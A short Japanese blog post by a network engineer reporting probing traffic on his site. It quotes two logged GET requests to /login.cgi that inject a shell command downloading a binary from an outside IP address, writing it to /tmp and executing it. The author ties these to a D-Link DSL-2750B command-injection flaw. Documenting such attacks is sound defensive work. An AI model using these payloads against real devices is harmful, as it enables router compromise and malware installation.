FC2ブログ

下流ネットワークエンジニアの生活

上流工程を夢見る下流工程のネットワークエンジニアがネットワーク技術や資格、身の回りのことを情報発信! Juniper Cisco YAMAHA DELL D-Link AlaxalA F5 CCNA CCNP CCIE ネットワークスペシャリスト

何らかの脆弱性を狙ったと思われる攻撃を検知

2018.08.03 (Fri)

最近、当サイトに以下のような
何らかの脆弱性を狙ったと思われる攻撃を検知を多数検知している。


"GET /login.cgi?cli=aa%20aa%27;wget%20http://178.128.11.199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%27$

"GET /login.cgi?cli=aa%20aa%27;wget%20http://199.195.254.118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$


後者のほうは、dlinkの文字列があり、
ネットワーク機器メーカのD-Link社製品を狙った攻撃と思われる。









少し調べらところ、
D-Link.DSL-2750B.CLI.OS.Command.Injection
に該当するような記事が見つかった。

https://fortiguard.com/encyclopedia/ips/46176/d-link-dsl-2750b-cli-os-command-injection



関連記事
スポンサーサイト



コメント


管理者のみに表示

トラックバック